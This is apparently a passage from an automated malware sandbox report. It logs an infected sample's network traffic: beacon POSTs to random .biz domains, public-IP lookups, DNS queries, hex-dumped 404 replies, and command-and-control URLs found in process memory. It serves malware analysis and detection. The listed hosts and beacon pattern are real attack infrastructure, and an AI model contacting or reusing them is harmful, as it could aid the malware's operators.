                          Source: global trafficHTTP traffic detected: POST /rss HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /vnlfrtbjm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /lcaecfwoxcmb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /okuqeyemp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /lwt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /ydgyvfihkfuxmwlx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /l HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /vcdhvtdni HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /pjpssoyxmlc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /pcyu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /kwsxhlpkribwfg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /lutwptrdxtxh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /fncvigkebkn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49752 version: TLS 1.0
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xpqdcslnor?usid=27&utid=10221865676 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                          Source: global trafficHTTP traffic detected: GET /ewl?usid=27&utid=10221865931 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET /m?usid=27&utid=10221880067 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
                          Source: global trafficHTTP traffic detected: GET /mt?usid=27&utid=10221880299 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
                          Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                          Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                          Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                          Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                          Source: global trafficDNS traffic detected: DNS query: przvgke.biz
                          Source: global trafficDNS traffic detected: DNS query: ww7.przvgke.biz
                          Source: global trafficDNS traffic detected: DNS query: ww12.przvgke.biz
                          Source: global trafficDNS traffic detected: DNS query: zlenh.biz
                          Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
                          Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
                          Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
                          Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
                          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                          Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
                          Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
                          Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
                          Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
                          Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
                          Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
                          Source: global trafficDNS traffic detected: DNS query: ww7.fwiwk.biz
                          Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
                          Source: global trafficDNS traffic detected: DNS query: deoci.biz
                          Source: global trafficDNS traffic detected: DNS query: gytujflc.biz
                          Source: global trafficDNS traffic detected: DNS query: qaynky.biz
                          Source: global trafficDNS traffic detected: DNS query: bumxkqgxu.biz
                          Source: global trafficDNS traffic detected: DNS query: dwrqljrr.biz
                          Source: global trafficDNS traffic detected: DNS query: nqwjmb.biz
                          Source: global trafficDNS traffic detected: DNS query: ytctnunms.biz
                          Source: global trafficDNS traffic detected: DNS query: myups.biz
                          Source: global trafficDNS traffic detected: DNS query: oshhkdluh.biz
                          Source: global trafficDNS traffic detected: DNS query: yunalwv.biz
                          Source: global trafficDNS traffic detected: DNS query: jpskm.biz
                          Source: global trafficDNS traffic detected: DNS query: lrxdmhrr.biz
                          Source: unknownHTTP traffic detected: POST /haobwbcukjixe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 31 Dec 2024 08:06:12 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 31 Dec 2024 08:06:13 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 31 Dec 2024 08:06:22 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 31 Dec 2024 08:06:22 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: officesvcmgr.exe.11.drString found in binary or memory: http://127.0.0.1:13556/HttpLogWriterEndpointInsiderSlabBehaviorInsiderSlabBehaviorReportedStateInsid
                          Source: alg.exe, 0000000B.00000003.2334108033.000000000059C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2334108033.0000000000562000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/
                          Source: alg.exe, 0000000B.00000003.2334108033.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/3
                          Source: alg.exe, 0000000B.00000003.2334108033.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/kcogybxqholgdpl
                          Source: alg.exe, 0000000B.00000003.2334108033.0000000000567000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/kcogybxqholgdpl0u0umF
                          Source: alg.exe, 0000000B.00000003.2334108033.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/s
                          Source: alg.exe, 0000000B.00000003.2334108033.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/kcogybxqholgdplrobat
                          Source: alg.exe, 0000000B.00000003.2509027263.0000000000567000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2490536622.0000000000567000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20/ydgyvfihkfuxmwlxiG
                          Source: zeXKjViL.exe, 00000022.00000002.1998728250.0000000001192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/snkwxvqngvs_
                          Source: alg.exe, 0000000B.00000003.1769440706.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/mmfoish
                          Source: alg.exe, 0000000B.00000003.2522275296.0000000000567000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/
                          Source: alg.exe, 0000000B.00000003.2521205367.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/gs
                          Source: alg.exe, 0000000B.00000003.2521205367.00000000005B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/kwsxhlpkribwfg
